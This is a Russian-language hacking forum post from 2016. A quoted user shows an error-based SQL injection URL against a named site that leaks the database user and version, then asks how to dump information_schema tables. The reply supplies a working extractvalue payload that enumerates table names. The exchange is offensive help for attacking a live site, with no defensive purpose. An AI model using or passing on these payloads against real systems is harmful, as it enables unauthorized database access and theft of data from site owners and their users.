27.08.2016, 19:34
|
|
Новичок
Регистрация: 14.08.2016
Сообщений: 17
С нами:
5130326
Репутация:
0
|
|
Сообщение от NonBlizz
↑
Не много запутался) есть уязвимость:
Код:
http://www.site.ru/publ.html'*updatexml(1,concat(0x3A,user(),version()),1)*'
version
(5.1.69)
а как мне вывести таблицы с information_schema....
P.S совсем башка не варит, колят магнезию(
extractvalue(rand(),concat(0x3a,(select+concat(0x3 a,table_name)+from+information_schema.tables+limit +0,1)))+--+
|
|
|